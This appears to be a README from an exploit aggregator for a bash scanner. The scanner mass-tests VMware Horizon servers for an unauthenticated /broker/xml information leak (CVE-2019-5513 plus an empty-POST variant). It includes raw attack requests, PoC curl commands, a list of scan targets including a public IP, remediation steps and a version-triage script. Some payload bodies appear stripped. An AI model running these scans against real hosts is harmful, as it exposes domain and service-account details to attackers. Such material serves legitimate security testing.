## https://sploitus.com/exploit?id=33F9D9CE-4D8F-59D4-AEF9-30A887B56326
# VMware Horizon /broker/xml Vulnerability Scanner

[![Security](https://img.shields.io/badge/security-bug%20bounty-red)](https://github.com)
[![Bash](https://img.shields.io/badge/shell-bash-green)](https://www.gnu.org/software/bash/)
[![License](https://img.shields.io/badge/license-MIT-blue)](LICENSE)

A high-performance multi-threaded scanner to detect unauthenticated information disclosure vulnerabilities in VMware Horizon Connection Server's `/broker/xml` endpoint.

## 📋 Overview

VMware Horizon Connection Server exposes an XML API endpoint (`/broker/xml`) that can leak sensitive internal configuration information without requiring authentication. This scanner quickly identifies vulnerable servers by testing **two attack vectors**:

1. **Empty POST Body (Zero-Day Discovery)** — Sends a completely empty POST request. The server leaks configuration data without any XML command.
2. **Crafted XML (CVE-2019-5513)** — Uses the documented `get-configuration` XML command.

## ๐Ÿ” Vulnerability Details

| Attribute | Value |
|-----------|-------|
| **CVE** | CVE-2019-5513 |
| **CVSS Score** | 5.3 (Medium) |
| **Vector** | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| **Affected Products** | VMware Horizon Connection Server 7.x before 7.8, 7.5.x before 7.5.2, 6.x before 6.2.8 |
| **Information Leaked** | Active Directory domain name, service account name (machine account), internal hostnames, gateway IP addresses |

### What Information Can Be Leaked?

```xml
            kerberos
            HORIZONSERVER$@CORPORATEDOMAIN.EXAMPLE.COM
        corporate-domain.example.com
```
## ⚡ Features

- **Blazing Fast** — Multi-threaded architecture (default 50 concurrent threads)
- **Dual Protocol Testing** — Checks both HTTPS (port 443) and HTTP (port 80) simultaneously
- **Two Attack Vectors** — Tests empty POST body (zero-day) + crafted XML (CVE-2019-5513)
- **Low Timeouts** — 5 second max per request, 3 second connection timeout
- **Clear Output** — Color-coded results with full XML response for vulnerable hosts
- **Results Export** — Save all findings to a file with the `-o` option
- **No Dependencies** — Uses only `curl` (standard on most systems)

## 🚀 Installation

```bash
# Clone the repository
git clone https://github.com/sudosu01/CVE-2019-5513-scanner/vmware-horizon-scanner.git
cd vmware-horizon-scanner

# Make the script executable
chmod +x broker.sh
```
## 📖 Usage

### Basic Scan

```bash
./broker.sh -d targets.txt
```

### Scan with Custom Threads (Faster)

```bash
./broker.sh -d targets.txt -t 100
```

### Scan and Save Results

```bash
./broker.sh -d targets.txt -t 100 -o results.txt
```

### Command Line Options

| Option | Description |
|--------|-------------|
| `-d` | Input file containing list of IP addresses/hostnames (one per line) |
| `-t` | Number of threads (default: 50) |
| `-o` | Output file to save results |
| `-h` | Show help message |
### Input File Format (targets.txt)

```text
# Comments start with #
185.171.101.236
192.168.1.100
10.0.0.50
example-vmware.com
```
## 📊 Example Output

```text
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   VMware Horizon /broker/xml Vulnerability Scanner
   Multi-Threaded Mode - 50 threads
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] Testing: Empty POST (Zero-Day) + Crafted XML (CVE-2019-5513)
[*] Protocols: HTTPS + HTTP (both tested simultaneously)

[*] Scanning 3 hosts...

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 185.171.101.236 | VULNERABLE | HTTPS | EMPTY_POST
Response:
            kerberos
            TEST-SERVER$@DOMAIN
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[-] 192.168.1.100 | NOT VULNERABLE

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 10.0.0.50 | VULNERABLE | HTTP | CRAFTED_XML
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] SCAN COMPLETE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    Total hosts: 3
    Vulnerable: 2
    Not vulnerable: 1
    Time taken: 4 seconds
```
## 🔬 Testing with Burp Suite

For manual testing, here are the raw requests:

### Test 1: Empty POST Body (Zero-Day)

```http
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 0
```

### Test 2: Crafted XML (CVE-2019-5513)

```http
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 115

```
๐Ÿ“ PoC curl Commands
Empty POST Body
bash
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  -d ''
Crafted XML
bash
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  --data-binary ''
๐Ÿ›ก๏ธ Remediation
Upgrade VMware Horizon Connection Server to a patched version:

Version	Fixed Release
7.x	7.8 or later
7.5.x	7.5.2 or later
6.x	6.2.8 or later
Additional Mitigations:

Implement network access controls to restrict access to /broker/xml endpoint

Use WAF rules to block unauthenticated requests to this endpoint

Monitor for suspicious POST requests to /broker/xml
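As an added example (not part of the scanner or its repository), the following bash script classifies a reported Connection Server version against the fixed releases in the table above, so an inventory export can be triaged before any network test; the `horizon_status` and `report_versions` function names, and the hostnames and versions in the demo, are constructed for this example.

```bash
#!/usr/bin/env bash
# Added example, not part of the scanner: classify a Horizon Connection Server
# version against the fixed releases in the Remediation table (7.8, 7.5.2, 6.2.8).
# Assumes dotted numeric version strings such as 7.7.0 or 7.5 (missing parts = 0).
set -u

# horizon_status VERSION  -> prints "vulnerable", "fixed" or "unknown"
horizon_status() {
    local ver="$1" old_ifs major minor patch
    # reject anything that is not digits and dots
    case "$ver" in ""|*[!0-9.]*) echo unknown; return 0 ;; esac
    old_ifs=$IFS; IFS=.; set -- $ver; IFS=$old_ifs
    major=${1:-0}; minor=${2:-0}; patch=${3:-0}
    case "$major" in
        7)
            if [ "$minor" -eq 5 ]; then
                # 7.5.x is its own maintenance branch: fixed from 7.5.2
                if [ "$patch" -ge 2 ]; then echo fixed; else echo vulnerable; fi
            elif [ "$minor" -ge 8 ]; then
                echo fixed              # other 7.x builds: fixed from 7.8
            else
                echo vulnerable
            fi ;;
        6)
            # 6.x: fixed from 6.2.8
            if [ "$minor" -gt 2 ] || { [ "$minor" -eq 2 ] && [ "$patch" -ge 8 ]; }; then
                echo fixed
            else
                echo vulnerable
            fi ;;
        *) echo unknown ;;   # branches the advisory does not list (e.g. 8.x)
    esac
}

# report_versions: reads "hostname version" lines on stdin (blank lines and
# # comments skipped) and prints "hostname version status" for each host
report_versions() {
    local host ver
    while read -r host ver; do
        case "$host" in ""|\#*) continue ;; esac
        printf '%s %s %s\n' "$host" "$ver" "$(horizon_status "$ver")"
    done
}

# Demo on a constructed inventory (hostnames and versions are made up):
#   ./horizon_versions.sh --demo
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "cs01.corp.example 7.7.0" "cs02.corp.example 7.5.2" \
                  "cs03.corp.example 6.2.7" "cs04.corp.example 8.1.0" | report_versions
fi
```

Versions outside the three listed branches are reported as `unknown` rather than `fixed`, so newer or unlisted builds still get a manual check against the vendor advisory.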

๐Ÿ™ Credits
This tool is based on research by the following security researchers:

Original CVE-2019-5513 Discovery โ€” Atredis Partners

Cory Mathews of Critical Start (independent discovery)

Zero-Day Discovery in This Tool
The empty POST body attack vector was identified during additional research. The original CVE required a crafted XML payload; this tool also tests the empty body method, which requires no payload construction and is even simpler to execute.

โš ๏ธ Disclaimer
This tool is for educational purposes and authorized security testing only. Unauthorized scanning of systems you do not own or have explicit permission to test may violate laws and regulations. The authors assume no liability for misuse.

๐Ÿ“„ License
MIT License

โญ Support
If you find this tool useful, please give it a star on GitHub!